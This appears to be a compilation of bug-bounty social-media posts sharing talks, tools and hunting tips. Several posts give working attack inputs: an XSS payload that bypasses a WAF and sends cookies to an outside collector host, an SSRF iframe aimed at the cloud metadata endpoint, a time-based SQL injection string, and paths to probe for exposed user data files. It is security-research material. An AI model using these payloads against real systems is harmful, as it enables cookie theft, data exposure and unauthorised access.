Video of my talking in #PHDays at PT Security youtu.be/CJnXjWXXB1Y?si… Hope you like it and enjoy it #bugbounty #bugbountytip #bugbountytips #infosec

I just published Mastering Logic Bugs: The Ultimate Checklist Update (Edition 🔍📋) medium.com/p/mastering-lo…

CVE-2025-4123 i wrote an extended tool for Grafana #github github.com/ynsmroztas/CVE… #bugbounty #bugbountytips

Automating CORS vulnerabilities can sometimes be quite easy: 😎 1. Discover subdomains using OWASP Amass/Subfinder 2. Run list with Corsy: $ corsy -i ./targets.txt 3. Look for authenticated endpoints on the host that disclose sensitive data to craft a proof of concept 🔗

Slides of the talk in #PHDays PT Security docs.google.com/presentation/d… hoping be very helpful for all of you ♥ #bugbounty #bugbountytips #bugbountytip If you didn't check the video of the talk , then its time ===>

First bounty from Intigriti ! - Vuln: web cache deception - Tool: github.com/c0dejump/wcDet… HF ! #BugBounty #intigriti

Punycode 0 click ATO is crazy 🔥🔥 Many thanks to Coffin for covering AmirMohammad Safari's article and explained very well with practical i do recommend to watch his video on YT. Intigriti and their triage team is so nice ❤️ (Severity changed from critical to high) Reason: 2FA

My new research Escalation of Self-XSS to XSS using modern browser capabilities. blog.slonser.info/posts/make-sel…

Extracted 106 juicy Endpoints from single js file with Endpwn👌 #BugBounty #hackerone #idor #sqlinjection #bugbountytip #xss #injection #privateinvitation #owasp

I wrote a simple tool for Globalprotect (Pan-OS) vpn Reflected XSS, you can find it here 🔥🔥 #github github.com/ynsmroztas/-CV… #BugBounty #bugbountytips

The endpoint was : /storage/users.csv Also try more endpoints like /storage/orders.csv /storage/transactions.csv /storage/reports.csv /storage/customers.csv /storage/backups/users_backup.csv /storage/tables/profiles.csv /storage/tables/roles.csv /storage/tables/invoices.csv

CF-Hero is a simple tool that helps you discover the origin IP of Cloudflare-protected servers using multiple sources! 😎 🔗 github.com/musana/CF-Hero

#Bugbountytip #bugbountytips Install JS Miner extension over Burp After crawling all endpoints Click on the target ==> Extensions > Js Miner > Run All Passive scans I got a result [Js Miner] Dependency Confusion The package is unclaimed over NPM Next step Create an account

#bugbountytip Quick tip and script : ✅️ If you are hunting or scanning a WordPress instance, don't forget to look for exposed plugins' or WP core REST endpoints, under /wp-json.. many plugins like payments gateways are exposing the webhooks or callback plugins in order to

Bug type: Business logic Tips: try to use premium plan in your free account, sometimes response manipulation worked also. #BugBounty #bugbountytips #mahfujwhh

This payload bypasses Cloudflare waf in certain cases: "top[8680439..toString(30)](document.domain)" or "top[8680439..toString(30)](new%20Image().src%3D%27https://xxx.oastify.com/log?cookie%3D%27%2Bdocument.cookie)" #BugBounty

If you find hosts like dev, stage, or panel that are only accessible to admin users, try fuzzing to discover hidden endpoints. Also, read the JavaScript files you might find a signup endpoint or an API key that can help you create a user and gain access to the panel.

I earned $1000 for my submission on @bugcrowd #ItTakesACrowd #bugbounty Tip: If a site generates a custom PDF using user input, test for HTML injection. If it works, try SSRF via an iframe to read metadata files: <iframe src="http://169.254.169.254/latest/meta-data/"></iframe>

Business logic #bugbountytips #bugbounty #mahfujwhh

Bounty : 1200$ Bug : Time Based SQLi Payload : 1'XOR(94102*if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z 1. found a POST request on endpoint  POST /Account 2. in that there was a Code parameter 3. Code=1'XOR(94102*if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z 4. injected this payload